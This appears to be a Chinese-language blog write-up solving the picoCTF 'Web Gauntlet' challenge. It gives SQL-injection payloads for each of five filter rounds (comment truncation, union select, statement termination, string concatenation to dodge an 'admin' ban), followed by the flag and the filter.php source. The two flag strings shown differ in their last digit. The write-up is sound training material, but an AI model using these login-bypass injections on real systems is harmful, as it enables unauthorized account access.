- 1若依低版本漏洞:shiro反序列化解决方式_若依shiro反序列化
- 2Python写登录注册系统+MySQL数据库,spring常见面试题总结超详细回答
- 3判断一个数是否为素数(python)_python判断一个数为素数
- 4用Python做一个植物大战僵尸_怎么用python写植物大战僵尸
- 5【数据结构笔记】数据结构基础—树_左子树
- 6现代循环神经网络:门控循环单元(GRU)
- 7【ROS2】spin_smoe的使用示例代码及踩坑点_rclcpp::spin_some
- 8代码随想录学习Day 2
- 9毕业设计之 ---- 基于深度学习图像识别的垃圾分类系统_基于深度学习的垃圾分类系统
- 10【Unity开发】【VR】PICO项目在运行编辑器时无法正常显示游戏场景_unity pico串流调试没有画面
picoCTF-Web Exploitation-Web Gauntlet
赞
踩
If the flag is not displayed after completing this challenge, try clearing your cookies. Cookies set by other challenges may prevent the flag from displaying properly.
Description
Can you beat the filters? Log in as admin
http://jupiter.challenges.picoctf.org:29164/
http://jupiter.challenges.picoctf.org:29164/filter.phpHints
You are not allowed to login with valid credentials.
Write down the injections you use in case you lose your progress.
For some filters it may be hard to see the characters, always (always)
look at the raw hex in the response.sqlite
If your cookie keeps getting reset, try using a private browser window
按照提示,需要用admin登录,查看filter.php,这应该是一个SQL注入题,提示我们可以使用无痕浏览器来以便cookie可以不用每次清除
使用admin随便试一下登录得到sql:
SELECT * FROM users WHERE username='admin' AND password='1’
- 1
Round1: or
提示sql过滤or,我们使用
username:admin' --
SELECT * FROM users WHERE username='admin' -- ' AND password='1’
- 1
Round2: or and like = –
username:admin' union select * from users where '1
SELECT * FROM users WHERE username='admin' union select * from users where '1' AND password='1’
- 1
Round3: or and = like > < –
username:admin';
SELECT * FROM users WHERE username='admin';' AND password='1’
- 1
Round4: or and = like > < – admin
username:ad'||'min';
SELECT * FROM users WHERE username='ad'||'min';' AND password='1’
- 1
Round5: or and = like > < – union admin
username:ad'||'min';
SELECT * FROM users WHERE username='ad'||'min';' AND password='1’
- 1
继续刷新filter.php 页面得到flag:picoCTF{y0u_m4d3_1t_a3ed4355668e74af0ecbb7496c8dd7c5}
最终filter.php 中展示了sql过滤逻辑,可以回味一下,尝试用不同的关键字来注入
<?php
session_start();
if (!isset($_SESSION["round"])) {
$_SESSION["round"] = 1;
}
$round = $_SESSION["round"];
$filter = array("");
$view = ($_SERVER["PHP_SELF"] == "/filter.php");
if ($round === 1) {
$filter = array("or");
if ($view) {
echo "Round1: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 2) {
$filter = array("or", "and", "like", "=", "--");
if ($view) {
echo "Round2: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 3) {
$filter = array(" ", "or", "and", "=", "like", ">", "<", "--");
// $filter = array("or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
if ($view) {
echo "Round3: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 4) {
$filter = array(" ", "or", "and", "=", "like", ">", "<", "--", "admin");
// $filter = array(" ", "/**/", "--", "or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
if ($view) {
echo "Round4: ".implode(" ", $filter)."<br/>";
}
} else if ($round === 5) {
$filter = array(" ", "or", "and", "=", "like", ">", "<", "--", "union", "admin");
// $filter = array("0", "unhex", "char", "/*", "*/", "--", "or", "and", "=", "like", "union", "select", "insert", "delete", "if", "else", "true", "false", "admin");
if ($view) {
echo "Round5: ".implode(" ", $filter)."<br/>";
}
} else if ($round >= 6) {
if ($view) {
highlight_file("filter.php");
}
} else {
$_SESSION["round"] = 1;
}
// picoCTF{y0u_m4d3_1t_a3ed4355668e74af0ecbb7496c8dd7c7}
?>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
